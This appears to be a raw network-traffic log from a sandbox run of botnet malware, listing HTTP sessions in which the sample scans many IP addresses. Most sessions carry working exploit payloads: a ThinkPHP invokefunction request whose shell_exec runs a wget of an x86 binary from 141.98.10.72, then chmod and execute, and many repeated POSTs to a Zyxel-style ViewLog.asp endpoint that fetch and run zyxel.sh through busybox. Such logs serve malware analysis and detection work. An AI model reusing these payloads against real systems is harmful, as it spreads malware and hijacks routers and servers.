                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:34.209214926 CET219INHTTP/1.1 400 Bad request
                                                      Content-length: 90
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      740192.168.2.155524295.59.106.19280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:34.062553883 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:34.356636047 CET29INHTTP/1.1 200 OK
                                                      Feb 14, 2024 09:30:34.361047983 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                      Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      741192.168.2.1559956112.167.244.20480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:34.346873045 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:34.631851912 CET270INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 113
                                                      Connection: close
                                                      Date: Wed, 14 Feb 2024 08:31:21 GMT
                                                      Server: httpd
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      742192.168.2.153812495.216.175.5980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:34.434632063 CET219INHTTP/1.1 400 Bad request
                                                      Content-length: 90
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      743192.168.2.1551770119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:35.613276958 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 31 3a 30 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:31:06Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      744192.168.2.153724431.136.214.2318080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.282176018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:39.512178898 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:45.655945063 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:57.687884092 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:22.263025999 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:11.413505077 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      745192.168.2.155084285.143.160.988080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.299185038 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      746192.168.2.153382894.190.178.1648080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.300669909 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:36.542227983 CET313INHTTP/1.1 403 Forbidden
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 106
                                                      Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      747192.168.2.153625094.120.14.1628080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.308357954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      748192.168.2.153611094.122.206.438080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.310131073 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      749192.168.2.154722694.121.147.388080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.310240030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      750192.168.2.153304031.44.137.428080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.314409971 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      751192.168.2.155865831.136.201.1618080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.485084057 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:37.112276077 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:38.360239029 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:41.048083067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:46.167898893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:56.151693106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:16.119189024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:57.078089952 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      752192.168.2.155802831.136.215.488080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.502897024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:37.176211119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:38.520255089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:41.304243088 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:46.679979086 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:57.431719065 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
